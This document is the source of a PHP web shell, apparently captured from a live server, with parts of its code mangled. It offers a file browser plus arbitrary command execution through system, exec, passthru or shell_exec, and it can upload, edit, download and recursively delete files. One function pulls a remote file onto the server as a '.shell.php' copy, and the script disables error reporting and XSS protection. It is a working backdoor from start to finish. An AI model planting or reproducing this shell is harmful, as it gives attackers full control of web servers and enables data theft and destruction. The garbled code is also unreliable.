<!DOCTYPE HTML><link href="" rel="stylesheet" type="text/css"><style>body{font-family:Times New Roman;background-color: black;color:white;}#content tr:hover{background-color: blue;text-shadow:0px 0px 10px #fff;}#content .first{background-color: blue;}table{border: 1px #000000 dotted;}a{color:white;text-decoration: none;}a:hover{color:blue;text-shadow:0px 0px 10px #ffffff;}input,select,textarea{border: 1px #000000 solid;-moz-border-radius: 5px;-webkit-border-radius:5px;border-radius:5px;}</style>error_reporting(0);set_time_limit(0);header("X-XSS-Protection: 0");function getpath(){ if(isset($_GET['d'])) { $d=$_GET['d']; }else{ $d=getcwd(); } return $d;}function cmd($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents();@ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; }}function delete($dir){if(is_dir($dir)){if(!rmdir($dir)){$s=scandir($dir);foreach ($s as $ss) {if(is_file($dir."/".$ss)){if(unlink($dir."/".$ss)){$rm=rmdir($dir);}}if(is_dir($dir."/".$ss)){$rm=rmdir($dir."/".$ss);$rm.=rmdir($dir);$rm.=system('rm -rf '.$dir);}}}}elseif(is_file($dir)){$rm = unlink($dir);if(!$rm){system('rm -rf '.$dir);}}return $rm;}function getowner($path){if(function_exists('posix_getpwuid')) {$downer = @posix_getpwuid(fileowner($path));$downer = $downer['name'];} else {$downer = fileowner($path);}return $downer;}function getgroup($path){if(function_exists('posix_getgrgid')) {$dgrp = @posix_getgrgid(filegroup($path));$dgrp = $dgrp['name'];} else { $dgrp = filegroup($path);}return $dgrp;}function upload($a,$b){ if(function_exists('move_uploaded_file')){$upl = move_uploaded_file($a,$b);}elseif (function_exists('copy')) { $upl = copy($a,$b);}return $upl; }function array_upload($file){ $file_ary = array(); $file_count = count($file['name']); $file_key = array_keys($file); for($i=0;$i<$file_count;$i++) { foreach($file_key as $val) { $file_ary[$i][$val] = $file[$val][$i]; } } return $file_ary;}function sedirs($dir){ if(function_exists('scandir')) { $s=scandir($dir); chdir($dir); }else{ $s=system($dir); } return $s;}function getperms($files){ if($s_m = @fileperms($files)){ $s_p = 'u'; if(($s_m & 0xC000) == 0xC000)$s_p = 's'; elseif(($s_m & 0xA000) == 0xA000)$s_p = 'l'; elseif(($s_m & 0x8000) == 0x8000)$s_p = '-'; elseif(($s_m & 0x6000) == 0x6000)$s_p = 'b'; elseif(($s_m & 0x4000) == 0x4000)$s_p = 'd'; elseif(($s_m & 0x2000) == 0x2000)$s_p = 'c'; elseif(($s_m & 0x1000) == 0x1000)$s_p = 'p'; $s_p .= ($s_m & 00400)? 'r':'-'; $s_p .= ($s_m & 00200)? 'w':'-'; $s_p .= ($s_m & 00100)? 'x':'-'; $s_p .= ($s_m & 00040)? 'r':'-'; $s_p .= ($s_m & 00020)? 'w':'-'; $s_p .= ($s_m & 00010)? 'x':'-'; $s_p .= ($s_m & 00004)? 'r':'-'; $s_p .= ($s_m & 00002)? 'w':'-'; $s_p .= ($s_m & 00001)? 'x':'-'; return $s_p; } else return "???????????";}function downloads($file){ @ob_clean(); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0');header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit;}function viewfilefunc($file){ echo "

View : ".basename($file)."

"; echo "<textarea readonly cols='100' rows='40'>"; echo htmlspecialchars(file_get_contents($file)); echo "</textarea>
";}function ts($s_s){ if($s_s<=0) return 0; $s_w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB'); $s_e = floor(log($s_s)/log(1024)); return sprintf('%.2f '.$s_w[$s_e], ($s_s/pow(1024, floor($s_e))));}function getsize($s_f){ $s_s = @filesize($s_f); if($s_s !== false){ if($s_s<=0) return 0; return ts($s_s); } else return "???";}function kuchiyose($a,$b){ $fgc=file_get_contents($a); $fp=fopen($b.".shell.php",'w'); fwrite($fp,$fgc); fclose($fp);}function cekk($f){ if(file_exists($f.".shell.php")){ echo "Request done ! <a href='$f.shell.php' target='_blank'>Click here</a>"; }}function renamefunc($dir,$oldname){ echo "

Rename : ".$oldname."


oldname : <input type='text' value='$oldname' class='in' readonly>"; echo "Newname : <input type='text' name='newname' value='newname' class='in'><input type='submit' value='>>' name='s'>
"; if(isset($_POST['s'])){ rename($dir."/".$oldname,$dir."/".$_POST['newname']); echo "<meta http-equiv='refresh' content='0;url=?d=".dirname($dir)."'>"; }}function editfunc($dir,$file){ echo "

Edit : ".$file."


"; echo "<textarea name='editfile' cols='100' rows='40'>".htmlspecialchars(file_get_contents($dir."/".$file))."</textarea>
"; echo "<input type='submit' name='sbmt' value='>>submit<<' style='width:200px;'>"; echo "
"; if(isset($_POST['sbmt'])) { $fp=fopen($dir."/".$file,'w'); fwrite($fp,$_POST['editfile']); fclose($fp); echo "
Tersimpan @".date('D ,d m Y')."
"; }}function berinamafunc($dir){ echo "

New file


"; echo "Filename : <input type='text' name='filename' value='newfile.php'>"; echo "<input type='submit' name='svi' value='>>'>"; echo "
"; if(isset($_POST['svi'])) { if(function_exists('touch')){ touch($dir."/".$_POST['filename']); }else{ $fp=fopen($dir."/".$_POST['filename'],'w'); fwrite($fp,'#new file 1945'); fclose($fp); } header('location:?d='.$dir.'&a=edit&f='.$_POST['filename']); }}function mkdirfunc($dir){ echo "

New directory

"; echo "
New dir:<input type='text' name='mkdir'>"; echo "<input type='submit' name='sbmt' value='>>'>
"; if(isset($_POST['sbmt'])) { mkdir($dir."/".$_POST['mkdir']); echo "<meta http-equiv='refresh' content='0;url=?d=".$dir."'>"; }}$gp=getpath();$y =Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64;<?php echo $y; ?> <title> echo $y; </title>
Upload file :>">
Command :
<a href="?d==$gp;&a=up">Upload</a></div><hr>echo "Current Dir=|> ";if(isset($_GET['path'])){$path = $_GET['path'];}else{$path = getcwd();}$path = str_replace('\\','/',$path);$paths = explode('/',$path);foreach($paths as $id=>$pat){if($pat == '' && $id == 0){$a = true;echo '<a href="?d=/">/</a>';continue;}if($pat == '') continue;echo '<a href="?d=';for($i=0;$i<=$id;$i++){echo "$paths[$i]";if($i != $id) echo "/";}echo '">'.$pat.'</a>/';} if(empty($_GET['a'])){ <table align="center" class="table"> <th>Files</th><th>Size</th><th>owner:group</th><th>Permission</th><th>Action</th>$dir=sedirs(getpath());echo "<a href=\"?d=".dirname($gp)."\">Current dir</a>------<td align=right><a href='?d=$gp&a=touch'>Newfile</a> | <a href='?d=$gp&a=mkdir'>newdir</a>";foreach($dir as $d1){if(!is_dir("$gp/$d1")||$d1=="."||$d1=="..")continue; [<a href="?d=="$gp/$d1"">=$d1;</a>] =getsize("$gp/$d1"); =getowner("$gp/$f1");:=getgroup("$gp/$f1"); =getperms("$gp/$d1"); <td align="right"><a href="?d=="$gp/$d1"&a=rename">Rename</a> | <a href="?d=="$gp/$d1"&a=delete">Delete</a> }foreach($dir as $f1){ if(!is_file("$gp/$f1")||$f1=="."||$f1=="..")continue; <a href="?d==$gp;&a=view&f==$f1;">=$f1;</a> =getsize("$gp/$f1"); =getowner("$gp/$f1");:=getgroup("$gp/$f1"); =getperms("$gp/$f1"); <td align="right"> <a href="?d==$gp;&a=rename&f==$f1;">Rename</a> | <a href="?d=="$gp/$f1";&a=delete">delete</a> | <a href="?d==$gp;&a=edit&f==$f1;">edit</a> | <a href="?d==$gp;&a=download&f==$f1;">download</a> }}else{@$a=$_GET['a'];@$f=$_GET['f'];@$d=$_GET['d'];if($a=="view"){viewfilefunc($d."/".$f);}elseif($a=="download"){downloads($d."/".$f);}elseif($a=="logout"){if(setcookie(md5($_SERVER['HTTP_HOST']),"")) echo "<script>alert('See You Next time !');window.location.href='????'</script>";}elseif($a=="rename"){$ff=(isset($_GET['f']) ? $_GET['f'] : basename($_GET['d']));$gdd=(isset($_GET['f'])) ? $_GET['d'] : dirname($_GET['d']); renamefunc($gdd,$ff);}elseif($a=="delete"){delete($_GET['d']);echo "<meta http-equiv='refresh' content='0;url=?d=".dirname($_GET['d'])."'>";}elseif($a=="upload"){ $fil=array_upload($_FILES['filup']); foreach($fil as $filup) { $filoc=$d."/".$filup['name']; if(upload($filup['tmp_name'],$filoc)) { echo "<font color=lime>Successfully upload -> <a href='?d=".$d."&a=view&f=".$filup['name']."'>".$filoc."</a></font>
"; }else{ echo "<font color=red>Failed upload -> ".$filoc."</font>
"; } }}elseif($a=="mkdir"){mkdirfunc($d);}elseif($a=="touch"){berinamafunc($d);}elseif($a=="edit"){editfunc($_GET['d'],$_GET['f']);}}